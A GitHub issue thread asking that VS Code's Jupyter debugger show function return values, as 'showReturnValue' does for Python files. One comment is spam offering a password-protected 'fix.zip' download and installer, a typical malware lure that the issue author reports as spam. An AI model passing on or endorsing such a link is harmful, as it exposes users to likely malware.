### ISSUE TITLE
Debugging: Show function return values in Run and Debug panel, Variables section

### ISSUE THREAD

**Issue by lukaszkadlubowski** [microsoft/vscode-jupyter#15959] opened 2024-08-26 14:51 UTC
VSCode supports `launch.json` files, where I can set `"showReturnValue": true` to see **function return values** when stepping through the functions while debugging. It works fine with regular python files. It seems however that `launch.json` is not used when debugging Jupyter Notebooks. It would be really helpful if this feature was supported.

This is how it works for regular Python files (and seemingly does not work when debugging Jupyter notebooks):

<img width="516" alt="debug-return-value" src="https://github.com/user-attachments/assets/24bef206-d6a6-42ee-b804-bdb60b5a57f3">

```python
def function1(a):
    return a + 1

def function2(a):
    return a + 2

print(f"Result is: {function1(function2(function1(function2(4))))}")
```

**Comment by JONTY650413** [comment] 2024-08-26 14:51
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by lukaszkadlubowski** [comment] 2024-08-26 15:03
> Download https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file password: changeme In the installer menu, select "gcc."

Reported as spam.

**Comment by DonJayamanne** [comment] 2024-12-11 01:36
DUPLICATE OF https://github.com/microsoft/vscode-jupyter/issues/15869

**Closed by DonJayamanne** 2024-12-11 01:36 UTC
Labels: feature-request
